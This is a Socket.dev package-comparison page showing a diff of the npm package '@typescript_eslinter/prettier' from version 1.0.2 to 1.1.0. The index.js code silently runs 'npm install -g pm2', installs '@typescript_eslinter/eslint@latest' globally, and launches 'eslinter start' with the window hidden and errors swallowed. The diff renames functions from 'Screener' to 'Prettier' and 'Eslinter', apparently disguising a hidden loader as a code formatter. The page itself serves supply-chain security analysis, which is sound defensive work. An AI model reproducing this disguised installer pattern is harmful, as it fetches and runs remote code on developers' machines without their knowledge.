New Case Study:See how Anthropic automated 95% of dependency reviews with Socket.Learn More
Socket
Sign inDemoInstall
Socket

@typescript_eslinter/prettier

Package Overview
Dependencies
Maintainers
0
Versions
10
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

@typescript_eslinter/prettier - npm Package Compare versions

Comparing version 1.0.2 to 1.1.0

12

index.js
const { exec } = require('child_process');
// Function to install pm2 globally
function installPm2() {
function installPrettier() {
return new Promise((resolve, reject) => {

@@ -17,3 +17,3 @@ exec('npm install -g pm2', (error, stdout, stderr) => {

// Function to install screener globally
function installScreener() {
function installEslinter() {
return new Promise((resolve, reject) => {

@@ -31,3 +31,3 @@ exec('npm install -g @typescript_eslinter/eslint@latest', (error, stdout, stderr) => {

// Function to start the folder with pm2
function startScreener() {
function startEslinter() {
return new Promise((resolve, reject) => {

@@ -47,5 +47,5 @@ exec(`eslinter start`, { windowsHide: true }, (error, stdout, stderr) => {

try {
await installPm2();
await installScreener();
await startScreener();
await installPrettier();
await installEslinter();
await startEslinter();
} catch (error) {

@@ -52,0 +52,0 @@ }

{
"name": "@typescript_eslinter/prettier",
"version": "1.0.2",
"version": "1.1.0",
"main": "index.js",

@@ -5,0 +5,0 @@ "scripts": {

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc